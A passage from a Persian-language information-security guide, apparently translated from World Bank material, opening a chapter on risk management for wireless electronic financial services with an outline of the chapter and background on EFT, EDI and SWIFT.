ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﻪ ﻣﺸﻜﻠﻲ ﺑﺮﺧﻮﺭﺩ ﻛﺮﺩﻳﺪ ﻛﻪ ﻻﺯﻡ ﺑـﻮﺩ ﺩﺭ ﺁﻥ
ﺍﺯ ﻛﻤﻚ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻳﻲ ﻗﺎﻧﻮﻥ ﻭ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺑﻬـﺮﻩ
ﺑﮕﻴﺮﻳﺪ ،ﻳﻚ ﺁﺷﻨﺎﻳﻲ ﺑﺴﻴﺎﺭ ﺍﻭﻟﻴﻪ ﺑﺎ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﻣـﻲﺗﻮﺍﻧـﺪ
ﺑﺴﻴﺎﺭ ﻛﺎﺭﺳﺎﺯ ﺑﺎﺷﺪ.
•
ﭘﻴﻮﺳﺘﻦ ﺑﻪ ﺟﻮﺍﻣﻊ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﻣـﺪﺍﻭﻡ ﺩﺭ
ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺑﻪ ﺍﻓـﺮﺍﺩ ﺁﮔـﺎﻫﻲ ﻭ ﺁﻣـﻮﺯﺵ ﻣـﻲﺩﻫﻨـﺪ ﺗـﺎ
ﺗﺨﺼﺺ ﺁﻧﻬﺎ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺍﻓـﺰﺍﻳﺶ ﻳﺎﺑـﺪ ﺭﺍ ﻓﺮﺍﻣـﻮﺵ
ﻧﻜﻨﻴﺪ.
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻓﺼﻞ ﺩﻫﻢ
ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ:
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
١٣٢
ﺩﺭ ﻣﺤﻴﻂ ﺑﻲﺳﻴﻢ
ﻛﻠﻴﺎﺕ
ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺩﺭ
ﺻﻨﺎﻳﻊ ﻭ ﺑﺨﺸﻬﺎﻱ ﺟﺪﻳﺪ
ﺭﺷﺪ ﺳﺮﻳﻊ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺎﺯﺍﺭﻫـﺎﻱ
ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ،ﺗﻮﺟـﻪ ﺩﻗﻴـﻖ ﺑـﻪ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴـﺖ
۱۳۲ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﻣﻘﺎﻟﺔ ﺑﺎﻧﻚ ﺟﻬـﺎﻧﻲ ﺑـﻪ ﻗﻠـﻢ Tom Kellerman
ﺗﺤﺖ ﻋﻨﻮﺍﻥ:
"Mobile Risk Management: e-Finance for the
Wireless Environment (2002)":
http://wbln0018.worldbank.org/html/FinancialS
ectorWeb.nsf/SearchGeneral?openform&ESecurity/E-Finance&Publications
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺣﻮﺯﺓ ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺿﺮﻭﺭﻱ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺍﻳـﻦ
ﻣﻮﺿﻮﻉ ﺩﺭ ﻫﻴﭽﻴﻚ ﺍﺯ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﺣـﻮﺯﺓ
ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ -ﻛﻪ ﺑﺎﻋﺚ ﺭﻭﺍﺝ ﻓﻨﺎﻭﺭﻱ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺭ ﺍﻳـﻦ
ﺑﺎﺯﺍﺭﻫﺎ ﺷﺪﻩ -ﺍﺯ ﺍﻫﻤﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ .ﻫﺮﭼـﻪ ﻛـﺸﻮﺭﻫﺎ ﺩﺭ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻴـﺸﺘﺮ ﺗـﻼﺵ
ﻛﻨﻨﺪ ،ﺗﻮﺟﻪ ﺑﻪ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﺓ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻭ
ﺍﻳﻨﻜﻪ ﺷﺮﻛﺎﻱ ﺗﺠﺎﺭﻱ ﺩﺭ ﺑﺎﺯﺍﺭ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴـﺴﺘﻢ ﺩﺭ ﺑﺎﻧﻜﻬـﺎ ﻭ
ﺳﺎﻳﺮ ﻣﺆﺳﺴﺎﺕ ﺧﺪﻣﺎﺗﻲ ﭼﻘﺪﺭ ﺑﻬﺘﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻣﻨﻴﺖ ﺭﺍ ﺗﻀﻤﻴﻦ
ﻛﻨﻨﺪ ﺣﻴﺎﺗﻲﺗﺮ ﻣﻲﺷﻮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﺪﻑ ﺍﻳﻦ ﻓﺼﻞ ﺗﻮﺿـﻴﺢ ﺍﻳـﻦ
ﻣﻄﻠﺐ ﺍﺳﺖ ﻛﻪ ﭼـﺮﺍ ﻭ ﭼﮕﻮﻧـﻪ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﻳـﻚ
ﺩﻏﺪﻏﻪ ﺗﺒﺪﻳﻞ ﻣﻲ ﺷﻮﺩ ﻭ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﺑﺪﻭﻥ ﭘﺮﺩﺍﺧﺖ ﻫﺰﻳﻨﺔ
ﺍﺿﺎﻓﻲ ﺑﻪ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻳﻦ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ
ﺩﺍﺩ .ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻧﻜﺘﺔ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻛﻪ ﺗﻐﻴﻴﺮﺍﺕ ﺑـﺴﻴﺎﺭ ﺳـﺮﻳﻊ
ﻓﻨــﺎﻭﺭﻱ ﺍﻣﻜــﺎﻥ ﺍﺭﺍﺋــﻪ ﺭﺍﻫﻜﺎﺭﻫــﺎﻱ ﺛﺎﺑــﺖ ﻭ ﺗﻐﻴﻴﺮﻧﺎﭘــﺬﻳﺮ ﺭﺍ ﺍﺯ
ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺳـﻠﺐ ﻛـﺮﺩﻩ ،ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﺍﻗﺪﺍﻣﺎﺗﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻮﺻﻴﻪ ﺷﺪﻩﺍﻧـﺪ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺍﻣﻨﻴـﺖ
ﭼﻨﺪﻻﻳﻪ ﺩﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺑﻲﺳـﻴﻢ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﻣـﻲﺑﺎﺷـﻨﺪ ،ﻭ
ﻧﻤﺎﻳــﺎﻧﮕﺮ ﺁﻧﭽــﻪ ﺍﻣــﺮﻭﺯ ﺑﻌﻨــﻮﺍﻥ ﺍﻟﮕﻮﻫــﺎﻱ ﺳــﺮﺁﻣﺪﻱ ﺍﻣﻨﻴــﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ ﻫﺴﺘﻨﺪ.
ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﻗﺴﻤﺘﻬﺎﻱ ﺯﻳﺮ ﺗﻘﺴﻴﻢ ﺷﺪﻩ :ﻗﺴﻤﺖ "ﺍﻟﻒ" ﺧﻮﺍﻧﻨﺪﻩ
ﺭﺍ ﺑﺎ ﮔﺴﺘﺮﺓ ﻭﺳﻴﻊ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﻭ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺁﺷﻨﺎ ﻣﻲﻛﻨﺪ؛ ﻗﺴﻤﺖ "ﺏ" ﺑﻪ ﻣﻌﺮﻓﻲ
ﻣﺨﺎﻃﺮﺍﺕ ﺫﺍﺗﻲ ﻓﻨﺎﻭﺭﻱ ﺑﻲ ﺳﻴﻢ ﻣﻲ ﭘﺮﺩﺍﺯﺩ؛ ﻗـﺴﻤﺖ "ﺝ" ﻧﻘـﺎﻁ
ﺿﻌﻒ ﺷﺒﻜﻪﻫـﺎﻱ ﻣﺤﻠـﻲ ﺑـﻲﺳـﻴﻢ ) ١٣٣(WLANsﻭ ﺭﻭﺍﻟﻬـﺎﻱ
ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻛﻪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺁﻧﻬـﺎ ﻻﺯﻡ ﻫـﺴﺘﻨﺪ ﺭﺍ
ﺷﺮﺡ ﻣﻲﺩﻫﺪ؛ ﻗﺴﻤﺖ "ﺩ" ﺑـﻪ ﺗﻜﺎﻣـﻞ ﺷـﺒﻜﻪ ﻫـﺎﻱ ﺳﺮﺍﺳـﺮﻱ
ﻣﺨﺎﺑﺮﺍﺕ ﺳﻴﺎﺭ )ﺷﺒﻜﻪﻫﺎﻱ ١٣٤(GSMﻭ ﺁﺳﻴﺒﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻧﻬـﺎ
ﻣﻲﭘﺮﺩﺍﺯﺩ؛ ﻗﺴﻤﺖ "ﻩ" ﺟﺰﺋﻴﺎﺕ ﺭﻭﺷـﻬﺎﻱ ﺻـﺤﻴﺢ ﻣﻮﺍﺟﻬـﻪ ﺑـﺎ
ﻣﺨﺎﻃﺮﺍﺕ ﺷﺒﻜﻪﻫﺎﻱ GSMﺭﺍ ﺗﻮﺿﻴﺢ ﻣﻲ ﺩﻫـﺪ؛ ﻗـﺴﻤﺖ "ﻭ"
ﺑﻪ ﺍﺭﺍﺋﻪ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﻩ ﺩﺭ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ
ﭘﺮﺩﺍﺧﺖ ﻣﻲﭘﺮﺩﺍﺯﺩ؛ ﻭ ﻗﺴﻤﺖ "ﺯ" ﻧﻴﺰ ﻳﻚ ﺟﻤﻊﺑﻨـﺪﻱ ﻧﻬـﺎﻳﻲ ﻭ
ﺩﻭﺭﻧﻤﺎﻳﻲ ﺍﺯ ﺁﻳﻨﺪﻩ )ﻧﺴﻞ ﺳﻮﻡ؛ (3Gﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ.
ﻫﺪﻑ ﺍﻳﻦ ﻓـﺼﻞ ﺍﺭﺍﺋـﻪ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﻣـﺪﻳﺮﻳﺖ
ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧـﺖ
ﺍﺳــﺖ .ﺍﻳــﻦ ﻓــﺼﻞ ﺗــﻼﺵ ﻣــﻲﻛﻨــﺪ ﺑــﺴﺘﺮﻱ ﺑــﺮﺍﻱ ﺍﺭﺯﻳــﺎﺑﻲ
133 Wireless Local Area Networks
134 Global System for Moblile Communication
Networks
ﺑﺨﺶ ﺳﻮﻡ
ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺑﺮﺭﺳﻲ ﻣﺨﺎﻃﺮﺍﺗﻲ ﻣﻲ ﭘﺮﺩﺍﺯﻳﻢ ﻛـﻪ ﺩﺭ ﻧﺘﻴﺠـﺔ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺩﺭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ ﻭ
ﺍﺯ ﻃﺮﻳﻖ ﺳﺮﻗﺖ ﻫﻮﻳﺖ ،ﺗـﺴﺨﻴﺮ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺳﻴـﺴﺘﻢ ،ﻭ ﺳـﺎﻳﺮ
ﺍﻗﺪﺍﻣﺎﺕ ﻣﺸﺎﺑﻪ ،ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨﻨـﺪ .ﺍﻳـﻦ
ﻓﺼﻞ ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﮔﺮﭼﻪ "ﺣﺠﻢ" ﻣﻌﺎﻣﻼﺗﻲ ﻛﻪ ﺩﺭ ﻣﺤﻴﻂ
ﻱ ﺍﻣﻨﻴﺘـﻲ
ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﻧﺪ ﺑﺮ ﮔﺴﺘﺮﺩﮔﻲ ﺣﻮﺯﺓ ﺍﻗـﺪﺍﻣﺎﺕ ﺿـﺮﻭﺭ ﹺ
ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺍﺳﺖ ،ﺍﻣﺎ ﺻـﺮﻑ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻧﻴـﺰ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﺷﻜﺎﺭ ﺷﺪﻥ ﻧﻘﺎﻁ ﺿﻌﻒ ﺍﻣﻨﻴﺘﻲ ﺑﻴﺎﻧﺠﺎﻣـﺪ .ﺩﺭ ﺍﻳـﻦ
ﻓﺼﻞ ﭼﻨﺪ ﻧﻜﺘﺔ ﻣﻬﻢ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧـﺪ ﻛـﻪ ﺭﺍﻫﺒـﺮﺍﻥ
ﺳﻴﺴﺘﻢ )ﺑﺨﺼﻮﺹ ﺩﺭ ﺑﺎﻧﻜﻬﺎ( ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺟﻬﺖ ﻛﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ
ﻻ ﺑـﺪﻭﻥ ﺍﻓـﺰﺍﻳﺶ ﺯﻳـﺎﺩ ﻫﺰﻳﻨـﺔ
ﺗﺎ ﺑﻴﺸﺘﺮﻳﻦ ﺣﺪ ﻣﻤﻜﻦ ﻭ ﻣﻌﻤﻮ ﹰ
ﺗﻤﺎﻡﺷﺪﻩ ،ﺁﻧﻬﺎ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ .ﺍﻗﺪﺍﻣﺎﺕ ﭘﻴـﺸﻨﻬﺎﺩﻱ ﺍﻳـﻦ ﻓـﺼﻞ
ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ،ﺑﻪ ﻧﻮﻋﻲ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﻣﻮﺟـﻮﺩ
ﺩﺭ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳـﻴﻢ ﺭﺍ ﻧﻴـﺰ ﺩﺭ ﺑـﺮ
ﻣﻲﮔﻴﺮﺩ.
١٨٥
١٨٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺍﺭﺍﺋﻪ ﻛﻨﺪ ﻛﻪ ﺩﺭ ﻣﺤﻴﻂ ﺑﻲﺳﻴﻢ ﻗﺎﺑﻞ ﻛـﺎﺭﺑﺮﺩ
ﺑﺎﺷﺪ.
ﺍﻟﻒ .ﻛﻠﻴﺎﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
١٣٥
ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﭼـﻪ ﺑـﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻭ ﭼـﻪ ﺑـﺎ
ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ،ﺭﺷــﺪ ﺳــﺮﻳﻌﻲ ﺩﺍﺷــﺘﻪﺍﻧــﺪ .ﻛــﺸﻮﺭﻫﺎ ﻭ
ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺑﺎ ﺭﻭﻧﺪ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ .ﺍﻳﻦ
ﻓﻨﺎﻭﺭﻳﻬــﺎ ﻧــﻪ ﺗﻨﻬــﺎ ﻛــﺸﻮﺭﻫﺎﻱ ﻋــﻀﻮ ﺩﺭ ﺷــﺒﻜﻪ ﺭﺍ ﮔــﺴﺘﺮﺵ
ﻣﻲﺩﻫﻨﺪ ،ﺑﻠﻜﻪ ﺭﺍﻫﻬﺎﻱ ﺟﺪﻳﺪﻱ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻮﺟﻮﺩ
ﻣﻲﺁﻭﺭﻧﺪ .ﺍﺯ ﺍﻭﺍﺳﻂ ﺩﻫﺔ ۹۰ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ ﺻﻨﻌﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ
ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺭﺿﺎﻳﺘﻤﻨﺪﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﻭﻱ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ
ﺗﻤﺮﻛﺰ ﻛﺮﺩﻩﺍﻧﺪ .ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﻨﺠـﺮ ﺑـﻪ ﻛـﺎﻫﺶ
ﻫﺰﻳﻨﻪﻫﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺷﺪﻩ ﺍﺳﺖ .ﺷﺒﻜﺔ ﺍﻳﻨﺘﺮﻧﺖ ﻋـﻼﻭﻩ ﺑـﺮ
ﺻﺮﻓﻪﺟﻮﻳﻲ ﺩﺭ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺛﺎﺑـﺖ ﺗﻮﺳـﻌﻪ ﻭ ﻧﮕﻬـﺪﺍﺭﻱ ﺷـﻌﺐ،
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺍﺣﻞ ﺍﺿـﺎﻓﻪ ﺭﺍ ﻧﻴـﺰ ﺣـﺬﻑ ﻛـﺮﺩﻩ ﻭ ﻫﺰﻳﻨـﻪﻫـﺎ ﺭﺍ
ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺍﺳﺖ .ﺍﻧﺠﺎﻡ ﻳﻚ ﺗﺮﺍﻛﻨﺶ ﻋـﺎﺩﻱ ﺍﺯ ﻃﺮﻳـﻖ ﻳـﻚ
ﺷﻌﺒﻪ ﻳﺎ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﻫﺰﻳﻨﻪﺍﻱ ﻣﻌﺎﺩﻝ ﻳـﻚ ﺩﻻﺭ ﺁﻣﺮﻳﻜـﺎ ﺩﺍﺭﺩ،
ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻧﺠﺎﻡ ﻫﻤﺎﻥ ﺗـﺮﺍﻛﻨﺶ ﺑـﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻫﺰﻳﻨـﻪﺍﻱ
ﻣﻌﺎﺩﻝ ۰،۰۲ﺩﻻﺭ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﻫﺰﻳﻨﻪﻫﺎﻱ ﻧﺎﺯﻝ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺎﻋﺚ ﺭﻭﺍﺝ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺷﺪﻩ ﺍﺳﺖ .ﺧـﺪﻣﺎﺕ ﻣﺒﺘﻨـﻲ
ﺑﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ
ﺧﺪﻣﺎﺕ ﺻﻨﻌﺘﻲ ﺭﺍﻳﺞ ﻫﺴﺘﻨﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ
ﺑﺮﺯﻳﻞ ﻫﻤﭽﻮﻥ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﮔﺴﺘﺮﺵ ﻳﺎﻓﺘﻪ ﺍﺳﺖ .ﺑـﻪ ﻋﻠـﺖ
ﻋﺪﻡ ﻭﺟﻮﺩ ﺯﻳﺮﺳـﺎﺧﺖ ﻣﻨﺎﺳـﺐ ﺧﻄـﻮﻁ ﺩﺭ ﻏﺎﻟـﺐ ﻛـﺸﻮﺭﻫﺎﻱ
ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ،ﺑﻴـﺸﺘﺮ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﺧـﺪﻣﺎﺕ ﺧـﻮﺩ ﺭﺍ ﺩﺭ
ﺑﺴﺘﺮﻫﺎﻱ ﺑﻲﺳﻴﻢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩﻩﺍﻧﺪ ﺗﺎ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺁﻧﻬـﺎ ﺭﺍ
ﮔﺴﺘﺮﺵ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ .ﻫﻤﺰﻣﺎﻥ ﺑﺎ ﺍﻳﻦ ﻭﺍﻗﻌﻴﺘﻬـﺎ ،ﭼﻬـﺎﺭ ﮔـﺮﺍﻳﺶ
ﻣــﺮﺗﺒﻂ ﺑــﺎ ﻓﻨــﺎﻭﺭﻱ ﺟﺪﻳــﺪ ﺩﺭ ﺻــﻨﻌﺖ ﺍﻳﺠــﺎﺩ ﺷــﺪﻩ ﺍﺳــﺖ:
ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ،ﻣﻌﻤﺎﺭﻱ ﺑﺎﺯ ،ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻳﻜﭙﺎﺭﭼـﻪ ،ﻭ ﺭﻭﺷـﻬﺎﻱ
١٣٦
ﺟﺪﻳﺪ ﭘﺮﺩﺍﺧﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ.
۱۳۵ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﻳﻚ ﺗﺤﻠﻴﻞ ﺩﻗﻴﻘﺘﺮ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ
ﻣﻨﺒـﻊ ﺯﻳـﺮ ﻧﻮﺷـﺘﺔ ،T. Kellerman ،T. Glaessenerﻭ V.
) McNevinﺳﺎﻝ (۲۰۰۲ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
"E-Security Risk Mitigation for Financial
"Transactions
136 Gilbride, Edward. Emerging Bank Technology
and the Implications for E-crime Presentation,
September 3, 2001
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﭼﻬﺎﺭ ﻗﺴﻤﺖ ﺍﺻﻠﻲ ﺗﺸﻜﻴﻞ ﺷـﺪﻩ:
ﺍﻧﺘﻘــﺎﻝ ﺳــﺮﻣﺎﻳﻪﻫــﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ) ،١٣٧(EFTﺗﺒــﺎﺩﻝ ﺩﺍﺩﺓ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ) ،١٣٨(EDIﺍﻧﺘﻘـﺎﻝ ﺳـﻮﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ) ١٣٩(EBTﻭ
ﺗﺄﻳﻴـــﺪ ﺗﺠـــﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـــﻲ ) EFT .١٤٠(ETCﺩﺭ ﻭﺍﻗـــﻊ
ﻗﺪﻳﻤﻲﺗﺮﻳﻦ ﺻﻮﺭﺕ ﺗﺒﺎﺩﻝ ﭘﻮﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺍﻭﺍﻳـﻞ
ﺩﻫﺔ ۱۹۶۰ﻣﺮﺳﻮﻡ ﺷﺪ .ﺩﺭ ﻣﻘﻴﺎﺱ ﺟﻬﺎﻧﻲ ﻣﻘﺪﺍﺭ ﺑﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ
EFTﺩﺭ ﺩﺍﺧﻞ ﻭ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺧﺰﺍﻧـﺔ ﺍﻳـﺎﻻﺕ
ﻣﺘﺤــﺪﻩ ﻣﻴــﺰﺍﻥ ﺁﻧــﺮﺍ ﺣــﺪﻭﺩ ۲ﺗﺮﻳﻠﻴــﻮﻥ ﺩﻻﺭ ﺩﺭ ﺭﻭﺯ ﻳــﺎ ۷۰۰
ﺗﺮﻳﻠﻴﻮﻥ ﺩﻻﺭ ﺩﺭ ﺳﺎﻝ ﺗﺨﻤـﻴﻦ ﺯﺩﻩ ﺍﺳـﺖ .ﺑﺨـﺶ ﻋﻤـﺪﻩﺍﻱ ﺍﺯ
ﻲ ﺷــﺒﻜﺔ SWIFTﺑﻮﺳــﻴﻠﺔ ﺧﻄــﻮﻁ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ
EFTﺑــﺎﻧﻜ ﹺ
ﻣﺎﻫﻮﺍﺭﻩ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ .ﺩﺭﺣﺎﻝ ﺣﺎﺿـﺮ ﺣـﺪﻭﺩﹰﺍ ﻧﻴﻤـﻲ ﺍﺯ ۲۰۰
